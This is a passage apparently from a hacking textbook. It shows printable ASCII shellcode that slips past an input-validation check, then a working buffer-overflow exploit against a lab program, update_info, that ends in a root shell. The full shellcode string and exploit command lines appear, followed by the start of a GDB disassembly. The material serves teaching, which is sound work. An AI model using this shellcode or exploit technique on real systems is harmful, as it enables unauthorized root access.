Graphics Programs Reference
In-Depth Information
At the end, the shellcode has been built somewhere after the loader
code, most likely leaving a gap between the newly built shellcode and the
executing loader code. This gap can be bridged by building a NOP sled
between the loader code and the shellcode.
Once again,
sub
instructions are used to set EAX to
0x90909090
, and
EAX is repeatedly pushed to the stack. With each
push
instruction, four NOP
instructions are tacked onto the beginning of the shellcode. Eventually, these
NOP instructions will build right over the executing
push
instructions of the
loader code, allowing the EIP and program execution to flow over the sled
into the shellcode.
This assembles into a printable ASCII string, which doubles as executable
machine code.
reader@hacking:~/booksrc $ nasm printable.s
reader@hacking:~/booksrc $ echo $(cat ./printable)
TX-3399-Purr-!TTTP\%JONE%501:-%mm4-%mm%--DW%P-Yf1Y-fwfY-yzSzP-iii%-Zkx%-%Fw%P-XXn6-99w%-ptt%P-
%w%%-qqqq-jPiXP-cccc-Dw0D-WICzP-c66c-W0TmP-TTTT-%NN0-%o42-7a-0P-xGGx-rrrx-aFOwP-pApA-N-w--
B2H2PPPPPPPPPPPPPPPPPPPPPP
reader@hacking:~/booksrc $
This printable ASCII shellcode can now be used to smuggle the actual
shellcode past the input-validation routine of the update_info program.
reader@hacking:~/booksrc $ ./update_info $(perl -e 'print "AAAA"x10') $(cat ./printable)
[DEBUG]: desc argument is at 0xbffff910
Segmentation fault
reader@hacking:~/booksrc $ ./update_info $(perl -e 'print "\x10\xf9\xff\xbf"x10') $(cat ./
printable)
[DEBUG]: desc argument is at 0xbffff910
Updating product ########### with description 'TX-3399-Purr-!TTTP\%JONE%501:-%mm4-%mm%--DW%P-
Yf1Y-fwfY-yzSzP-iii%-Zkx%-%Fw%P-XXn6-99w%-ptt%P-%w%%-qqqq-jPiXP-cccc-Dw0D-WICzP-c66c-W0TmP-
TTTT-%NN0-%o42-7a-0P-xGGx-rrrx-aFOwP-pApA-N-w--B2H2PPPPPPPPPPPPPPPPPPPPPP'
sh-3.2# whoami
root
sh-3.2#
Neat. In case you weren't able to follow everything that just happened
there, the output below watches the execution of the printable shellcode
in GDB. The stack addresses will be slightly different, changing the return
addresses, but this won't affect the printable shellcode—it calculates its loca-
tion based on ESP, giving it this versatility.
reader@hacking:~/booksrc $ gdb -q ./update_info
Using host libthread_db library "/lib/tls/i686/cmov/libthread_db.so.1".
(gdb) disass update_product_description
Dump of assembler code for function update_product_description:
0x080484a8 <update_product_description+0>: push ebp
0x080484a9 <update_product_description+1>: mov ebp,esp
0x080484ab <update_product_description+3>: sub esp,0x28
0x080484ae <update_product_description+6>: mov eax,DWORD PTR [ebp+8]
0x080484b1 <update_product_description+9>: mov DWORD PTR [esp+4],eax
